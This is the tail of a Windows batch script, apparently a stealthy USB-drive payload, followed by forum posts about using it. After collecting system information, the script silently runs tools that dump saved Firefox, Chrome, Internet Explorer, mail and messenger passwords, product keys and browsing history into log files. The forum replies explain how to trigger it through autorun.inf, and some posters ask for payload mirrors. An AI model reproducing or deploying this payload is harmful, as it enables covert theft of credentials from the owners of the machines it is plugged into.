ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

REM Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER
reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKLMrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt
reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKLMrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKCUrun.reg -y  >> %1\logs\%computername%\sysinfo-%computername%.txt
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKCUrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\sysinfo-%computername%.txt
goto ERRORLOG

:ERRORLOG
ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt
ECHO +           [System Error Log]          +>> %1\logs\%computername%\syslog-%computername%.txt
ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt
ECHO. >> %1\logs\%computername%\syslog-%computername%.txt
ECHO This will only work in Windows Vista/XP >> %1\logs\%computername%\syslog-%computername%.txt
ECHO. >> %1\logs\%computername%\syslog-%computername%.txt
REM Grab Sytem Error Log for Review (Error ONLY)
cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System >> %1\logs\%computername%\syslog-%computername%.txt
REM Grab Application Error Logs for Review
cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application >> %1\logs\%computername%\syslog-%computername%.txt
goto PORT

:PORT
ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO +            [Port Scan]           + >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
START .\portqry -local -l %1\logs\%computername%\netlog-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
goto MD5

:MD5
ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO +  [MD5 Hashes of the system directory]  +>> %1\logs\%computername%\osmd5-%computername%.txt
ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

echo %date% %time%  >> %1\logs\%computername%\osmd5-%computername%.txt
md5sums %systemroot% >> %1\logs\%computername%\osmd5-%computername%.txt
md5sums %systemroot%\system >> %1\logs\%computername%\osmd5-%computername%.txt
md5sums %systemroot%\system32 >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\osmd5-%computername%.txt
goto MDINFO

:MDINFO
IF NOT EXIST %1\logs\%computername%\userinfo (
MD %1\logs\%computername%\userinfo\
)
goto MDPASS
:MDPASS
IF NOT EXIST %1\logs\%computername%\userinfo\pass (
MD %1\logs\%computername%\userinfo\pass\
)
goto IEFIREHIST

:IEFIREHIST


:INFO
ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +        [Information Recovery]        + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt
ECHO +         [Dumping IE and FireFox history]           +>> %1\logs\%computername%\userinfo\urllog-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

START .\FirePassword.exe >> %1\logs\%computername%\userinfo\pass\firepass-%computername%.txt
START cscript  .\IE_FireFox.vbs >> %1\logs\%computername%\userinfo\firehistorylog-%computername%.txt
START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\firepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\firehistorylog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\IElog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +            [Dump Mail PW]            + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\mailpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\mailpv.exe /stext "%1\logs\%computername%\userinfo\pass\mailpass-%computername%.txt" /sort "Application" /sort "Name"

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +           [Dump IE PW]           + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\IEpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\iepv.exe /stext "%1\logs\%computername%\userinfo\pass\IEpass-%computername%.txt" /sort "Entry Name"

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +       [Dump Messanger PW]        + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords will be dumped in .\pass\MSpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\mspass.exe /stext %1\logs\%computername%\userinfo\pass\MSpass-%computername%.txt

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +        [Dump Product Keys]       + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\PRODUKEY.exe /nosavereg /stext "%1\logs\%computername%\userinfo\productkeys-%computername%.txt" /remote %computername% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +            [Dumping Chrome Passwords]              + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\chromepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\ChromePass.exe /stext %1\logs\%computername%\userinfo\pass\chromepass-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
goto END

:END
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO [Time Completed: %date% %time%] >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
START EXPLORER.EXE
exit

i jus downloaded the Ghostpad... how do i install(sorry if i annoy you with my newbie questions)

[Tox1k]

Lol don't use my payload, I never finished it. Use someone like Gonzor's, just look at the topics within the thread. As for mounting it, you'll need to put an autorun.inf file in it that runs start.bat, (google), and then either follow this tut or download this which has instructions and all the tools you need included.[/url]

[kira]

Hello all
ive got a really BIG problem when attempting to use this 'stealthy' attack....
On windows 7 I get ALOT of UAC, meaning even when admin, it asks whether i would like to let this program make changes to the computer.
It does somewhat defeat the point it works fine on XP, though. Is it meant to do this? Im most likely doing something wrong if it inst meant to show the 7 displays of UAC
thankyou for reading

[Ethan Hunt]

Massive, perhaps pointless, bump on this topic, but do you guys have the payloads archived somewhere? I'm looking for both the U3 and Non-U3 versions.

Played with this ages ago, and something interested me in this again, but I lost my backups like 4 years ago

So if anyone could upload them somewhere I would be very grateful!

Thanks!

[lmgonza]

Well if anyone can send me to a payload like the first one id be appreciated thanks!

[toruguen42]

All mirrors are down??.. any word or work on setting up a new mirror? used to have the tool till my AV killed my copy..... put the wrong drive in.